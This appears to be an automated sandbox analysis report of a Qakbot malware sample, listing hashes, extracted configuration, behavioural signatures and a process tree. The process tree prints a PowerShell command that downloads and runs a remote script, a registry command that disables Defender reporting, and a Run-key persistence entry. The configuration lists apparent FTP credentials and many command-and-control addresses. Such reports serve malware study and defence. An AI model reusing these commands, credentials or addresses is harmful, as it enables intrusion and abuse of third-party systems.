Analysis
-
max time kernel
149s -
max time network
123s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-02-2022 22:36
Static task
static1
Behavioral task
behavioral1
Sample
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Resource
win10v2004-en-20220113
General
-
Target
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
-
Size
400KB
-
MD5
30f804952e82a4bf30c776402967850f
-
SHA1
6db90c30220e594b31366a24a53fdb55308a4357
-
SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
-
SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
Malware Config
Extracted
https://www.allens-treasure-house.com/books_files/001.ps1
Extracted
qakbot
322.148
1518695014
Protocol: ftp- Host:
66.96.133.9 - Port:
21 - Username:
help - Password:
eT5TerAcnFe6~
Protocol: ftp- Host:
174.123.38.58 - Port:
21 - Username:
[email protected] - Password:
4BQ1MeeRAwNZEVu
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
[email protected] - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
[email protected] - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
[email protected] - Password:
RoP4Af0RKAAQ74V
179.62.153.88:443
50.198.141.161:2222
69.129.91.38:443
66.189.228.49:995
96.253.104.73:443
71.183.129.113:443
125.25.130.203:995
173.175.174.154:443
162.104.186.175:995
75.109.222.140:995
68.173.55.51:443
78.175.254.43:443
106.159.251.143:995
47.143.83.172:443
71.190.202.120:443
73.136.232.174:995
96.253.104.73:995
192.158.217.32:22
65.153.16.250:993
70.95.129.59:443
105.225.253.101:443
216.93.143.182:995
71.41.141.206:443
69.129.91.38:32102
47.223.78.244:993
47.40.29.239:443
47.33.213.104:443
74.93.207.181:993
178.54.193.161:443
156.217.12.177:443
66.222.48.40:443
96.70.92.177:1194
74.95.207.214:990
47.221.46.163:443
65.73.215.139:990
198.0.111.129:443
70.117.246.103:443
96.253.104.73:50002
24.240.235.106:443
68.133.47.184:443
70.167.30.88:443
216.218.74.196:443
199.115.167.168:443
132.206.59.132:443
74.95.207.214:443
72.204.249.114:2222
87.243.32.159:443
76.0.178.104:443
189.155.221.97:993
209.212.131.66:443
78.158.195.141:995
47.201.56.21:443
65.40.207.151:995
47.149.85.238:443
104.231.199.203:443
69.193.199.50:443
74.84.15.214:443
174.66.86.206:443
190.137.200.166:443
216.201.159.118:443
99.196.254.46:443
73.126.4.33:443
68.5.211.85:443
50.42.189.206:993
78.182.109.227:443
98.103.2.226:443
75.127.141.50:995
65.100.49.186:465
12.161.77.98:443
109.75.195.157:443
76.27.69.75:443
70.94.109.57:443
65.153.16.250:995
50.195.161.2:995
98.216.56.48:443
47.22.21.180:995
67.83.122.112:2222
209.213.24.194:443
97.68.164.170:990
24.176.181.14:443
142.114.93.235:2222
75.83.30.135:443
68.50.161.232:443
31.206.147.0:995
24.119.224.202:2078
68.0.186.126:443
184.186.73.221:443
100.35.65.82:995
174.57.88.157:443
46.175.67.170:443
50.74.66.214:443
96.85.138.153:995
71.85.72.9:443
175.107.54.44:443
65.153.16.250:465
103.228.43.58:443
76.104.40.157:443
68.203.159.21:443
73.1.116.205:443
86.57.136.126:990
73.136.132.231:443
192.158.217.32:443
70.189.67.15:443
45.36.199.50:443
186.107.214.4:443
173.49.95.92:443
203.109.206.203:465
73.198.142.130:995
174.58.149.247:443
98.74.157.85:443
73.206.97.214:443
104.33.67.39:443
135.84.195.154:995
189.155.221.97:995
73.182.163.200:443
50.73.23.181:995
74.95.207.214:995
73.93.154.150:443
186.109.26.149:443
65.100.49.186:443
74.95.207.214:465
74.69.244.255:443
68.83.130.163:443
73.77.17.146:443
108.58.129.90:443
74.42.21.175:995
49.151.84.2:443
108.35.28.73:443
98.218.243.27:443
76.177.73.90:995
71.41.225.171:443
24.187.255.116:443
24.223.103.6:443
74.95.207.214:993
76.95.241.114:443
69.41.8.88:443
23.240.50.137:443
47.201.138.241:443
69.132.80.73:443
68.198.107.62:2222
65.33.119.17:443
50.244.177.253:443
65.100.49.186:995
12.166.108.82:995
108.58.129.90:995
187.138.102.154:443
65.100.49.186:2222
50.44.111.101:443
170.231.89.56:2222
108.27.217.183:443
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 772 powershell.exe 6 772 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
harfw.exeharfw.exepid process 1452 harfw.exe 1368 harfw.exe -
Loads dropped DLL 3 IoCs
Processes:
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exeharfw.exepid process 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 1452 harfw.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\dmanwx = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Harfwa\\harfw.exe\"" explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exeharfw.exeharfw.exepowershell.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXEconhost.execmd.execonhost.exePING.EXEpid process 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 1636 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 1636 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 1452 harfw.exe 1368 harfw.exe 772 powershell.exe 1368 harfw.exe 396 explorer.exe 1256 taskhost.exe 396 explorer.exe 1360 Dwm.exe 1396 Explorer.EXE 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 772 powershell.exe 688 conhost.exe 396 explorer.exe 920 cmd.exe 1572 conhost.exe 1996 PING.EXE 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe 396 explorer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1396 Explorer.EXE -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
harfw.exepid process 1452 harfw.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 772 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 1396 Explorer.EXE 1396 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
Explorer.EXEpid process 1396 Explorer.EXE 1396 Explorer.EXE -
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exeharfw.exeexplorer.execmd.exedescription pid process target process PID 836 wrote to memory of 1636 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe PID 836 wrote to memory of 1636 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe PID 836 wrote to memory of 1636 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe PID 836 wrote to memory of 1636 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe PID 836 wrote to memory of 1452 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe harfw.exe PID 836 wrote to memory of 1452 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe harfw.exe PID 836 wrote to memory of 1452 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe harfw.exe PID 836 wrote to memory of 1452 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe harfw.exe PID 836 wrote to memory of 1080 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe reg.exe PID 836 wrote to memory of 1080 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe reg.exe PID 836 wrote to memory of 1080 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe reg.exe PID 836 wrote to memory of 1080 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe reg.exe PID 836 wrote to memory of 772 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe powershell.exe PID 836 wrote to memory of 772 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe powershell.exe PID 836 wrote to memory of 772 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe powershell.exe PID 836 wrote to memory of 772 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe powershell.exe PID 1452 wrote to memory of 1368 1452 harfw.exe harfw.exe PID 1452 wrote to memory of 1368 1452 harfw.exe harfw.exe PID 1452 wrote to memory of 1368 1452 harfw.exe harfw.exe PID 1452 wrote to memory of 1368 1452 harfw.exe harfw.exe PID 1452 wrote to memory of 396 1452 harfw.exe explorer.exe PID 1452 wrote to memory of 396 1452 harfw.exe explorer.exe PID 1452 wrote to memory of 396 1452 harfw.exe explorer.exe PID 1452 wrote to memory of 396 1452 harfw.exe explorer.exe PID 1452 wrote to memory of 396 1452 harfw.exe explorer.exe PID 396 wrote to memory of 1256 396 explorer.exe taskhost.exe PID 396 wrote to memory of 1256 396 explorer.exe taskhost.exe PID 396 wrote to memory of 1256 396 explorer.exe taskhost.exe PID 396 wrote to memory of 1360 396 explorer.exe Dwm.exe PID 396 wrote to memory of 1360 396 explorer.exe Dwm.exe PID 396 wrote to memory of 1360 396 explorer.exe Dwm.exe PID 396 wrote to memory of 1396 396 explorer.exe Explorer.EXE PID 396 wrote to memory of 1396 396 explorer.exe Explorer.EXE PID 396 wrote to memory of 1396 396 explorer.exe Explorer.EXE PID 396 wrote to memory of 836 396 explorer.exe 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe PID 396 wrote to memory of 836 396 explorer.exe 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe PID 396 wrote to memory of 836 396 explorer.exe 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe PID 396 wrote to memory of 772 396 explorer.exe powershell.exe PID 396 wrote to memory of 772 396 explorer.exe powershell.exe PID 396 wrote to memory of 772 396 explorer.exe powershell.exe PID 396 wrote to memory of 688 396 explorer.exe conhost.exe PID 396 wrote to memory of 688 396 explorer.exe conhost.exe PID 396 wrote to memory of 688 396 explorer.exe conhost.exe PID 836 wrote to memory of 920 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe cmd.exe PID 836 wrote to memory of 920 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe cmd.exe PID 836 wrote to memory of 920 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe cmd.exe PID 836 wrote to memory of 920 836 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe cmd.exe PID 920 wrote to memory of 1996 920 cmd.exe PING.EXE PID 920 wrote to memory of 1996 920 cmd.exe PING.EXE PID 920 wrote to memory of 1996 920 cmd.exe PING.EXE PID 920 wrote to memory of 1996 920 cmd.exe PING.EXE PID 396 wrote to memory of 920 396 explorer.exe cmd.exe PID 396 wrote to memory of 920 396 explorer.exe cmd.exe PID 396 wrote to memory of 920 396 explorer.exe cmd.exe PID 396 wrote to memory of 1572 396 explorer.exe conhost.exe PID 396 wrote to memory of 1572 396 explorer.exe conhost.exe PID 396 wrote to memory of 1572 396 explorer.exe conhost.exe PID 396 wrote to memory of 1996 396 explorer.exe PING.EXE PID 396 wrote to memory of 1996 396 explorer.exe PING.EXE PID 396 wrote to memory of 1996 396 explorer.exe PING.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe" /C3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exeC:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe" /C4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\nvtbwkfteawercajkosxmtvjkb.txt'"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.14⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1048679824-641473634-5093629621605390816-1721825357-13111516982259047032052131543"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "55744527-1190308623108169139918329020741157474417-1791291403-1384991350515096794"1⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harf.datMD5
c019c9971ac9b09a446c52697ad6463f
SHA1b7e7ab1dd2bb91e31beb0bc712e8a66f0f54a9f7
SHA25611ccb77316c9a2b4f76707ae01b9859dc3f8ef58499be1ad299195704f288829
SHA512449dacc6cc424408689f70f0d629788b59cda6836789387b012130f3d8a0a4092c47cb54bd5a83a61fb223d1062d2a921715a1ddfd4c049d12a4221c630c2d73
-
C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exeMD5
30f804952e82a4bf30c776402967850f
SHA16db90c30220e594b31366a24a53fdb55308a4357
SHA256058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
-
C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exeMD5
30f804952e82a4bf30c776402967850f
SHA16db90c30220e594b31366a24a53fdb55308a4357
SHA256058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
-
C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exeMD5
30f804952e82a4bf30c776402967850f
SHA16db90c30220e594b31366a24a53fdb55308a4357
SHA256058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
-
\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exeMD5
30f804952e82a4bf30c776402967850f
SHA16db90c30220e594b31366a24a53fdb55308a4357
SHA256058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
-
\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exeMD5
30f804952e82a4bf30c776402967850f
SHA16db90c30220e594b31366a24a53fdb55308a4357
SHA256058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
-
\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exeMD5
30f804952e82a4bf30c776402967850f
SHA16db90c30220e594b31366a24a53fdb55308a4357
SHA256058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
-
memory/396-92-0x00000000007F0000-0x00000000007F1000-memory.dmpFilesize
4KB
-
memory/396-99-0x0000000000220000-0x0000000000221000-memory.dmpFilesize
4KB
-
memory/396-131-0x00000000022E0000-0x00000000022E1000-memory.dmpFilesize
4KB
-
memory/396-110-0x00000000020A0000-0x00000000020A1000-memory.dmpFilesize
4KB
-
memory/396-108-0x0000000002040000-0x0000000002041000-memory.dmpFilesize
4KB
-
memory/396-107-0x0000000002030000-0x0000000002031000-memory.dmpFilesize
4KB
-
memory/396-70-0x00000000745E1000-0x00000000745E3000-memory.dmpFilesize
8KB
-
memory/396-97-0x0000000000200000-0x0000000000201000-memory.dmpFilesize
4KB
-
memory/396-72-0x00000000000C0000-0x0000000000128000-memory.dmpFilesize
416KB
-
memory/396-91-0x00000000007D0000-0x00000000007D1000-memory.dmpFilesize
4KB
-
memory/396-88-0x0000000000630000-0x000000000065F000-memory.dmpFilesize
188KB
-
memory/396-85-0x00000000007C0000-0x00000000007C1000-memory.dmpFilesize
4KB
-
memory/396-84-0x00000000004E0000-0x00000000004E1000-memory.dmpFilesize
4KB
-
memory/396-83-0x0000000000240000-0x0000000000241000-memory.dmpFilesize
4KB
-
memory/688-111-0x0000000077060000-0x0000000077061000-memory.dmpFilesize
4KB
-
memory/688-109-0x0000000000160000-0x000000000018C000-memory.dmpFilesize
176KB
-
memory/772-60-0x000007FEF2D00000-0x000007FEF385D000-memory.dmpFilesize
11.4MB
-
memory/772-65-0x000007FEF542E000-0x000007FEF542F000-memory.dmpFilesize
4KB
-
memory/772-116-0x000007FEFEF80000-0x000007FEFEF81000-memory.dmpFilesize
4KB
-
memory/772-113-0x0000000077060000-0x0000000077061000-memory.dmpFilesize
4KB
-
memory/772-112-0x000000001B6A0000-0x000000001B6CC000-memory.dmpFilesize
176KB
-
memory/772-66-0x0000000001FE0000-0x0000000001FE2000-memory.dmpFilesize
8KB
-
memory/772-71-0x0000000001FEB000-0x000000000200A000-memory.dmpFilesize
124KB
-
memory/772-67-0x0000000001FE2000-0x0000000001FE4000-memory.dmpFilesize
8KB
-
memory/772-59-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmpFilesize
8KB
-
memory/772-68-0x0000000001FE4000-0x0000000001FE7000-memory.dmpFilesize
12KB
-
memory/836-94-0x0000000000280000-0x00000000002A7000-memory.dmpFilesize
156KB
-
memory/836-105-0x00000000003F0000-0x00000000003F1000-memory.dmpFilesize
4KB
-
memory/836-53-0x0000000076421000-0x0000000076423000-memory.dmpFilesize
8KB
-
memory/836-101-0x0000000000280000-0x00000000002A7000-memory.dmpFilesize
156KB
-
memory/836-100-0x00000000003A0000-0x00000000003A1000-memory.dmpFilesize
4KB
-
memory/836-103-0x0000000077490000-0x0000000077491000-memory.dmpFilesize
4KB
-
memory/920-129-0x0000000077490000-0x0000000077491000-memory.dmpFilesize
4KB
-
memory/920-118-0x0000000000150000-0x0000000000178000-memory.dmpFilesize
160KB
-
memory/920-130-0x0000000000190000-0x0000000000191000-memory.dmpFilesize
4KB
-
memory/920-128-0x0000000000120000-0x0000000000147000-memory.dmpFilesize
156KB
-
memory/1256-86-0x00000000005A0000-0x00000000005A1000-memory.dmpFilesize
4KB
-
memory/1256-76-0x00000000005A0000-0x00000000005A1000-memory.dmpFilesize
4KB
-
memory/1256-87-0x0000000001B50000-0x0000000001B7C000-memory.dmpFilesize
176KB
-
memory/1256-74-0x0000000001B50000-0x0000000001B7C000-memory.dmpFilesize
176KB
-
memory/1256-90-0x0000000077060000-0x0000000077061000-memory.dmpFilesize
4KB
-
memory/1256-75-0x0000000001B80000-0x0000000001BAD000-memory.dmpFilesize
180KB
-
memory/1256-89-0x00000000772E1000-0x00000000772E2000-memory.dmpFilesize
4KB
-
memory/1360-93-0x0000000001E30000-0x0000000001E5C000-memory.dmpFilesize
176KB
-
memory/1360-95-0x0000000077060000-0x0000000077061000-memory.dmpFilesize
4KB
-
memory/1396-115-0x0000000077060000-0x0000000077061000-memory.dmpFilesize
4KB
-
memory/1396-114-0x00000000026E0000-0x000000000270C000-memory.dmpFilesize
176KB
-
memory/1572-132-0x0000000001AD0000-0x0000000001AFC000-memory.dmpFilesize
176KB
-
memory/1572-133-0x0000000077060000-0x0000000077061000-memory.dmpFilesize
4KB
-
memory/1996-134-0x0000000000250000-0x0000000000277000-memory.dmpFilesize
156KB
-
memory/1996-135-0x0000000077490000-0x0000000077491000-memory.dmpFilesize
4KB
-
memory/1996-136-0x00000000001A0000-0x00000000001A1000-memory.dmpFilesize
4KB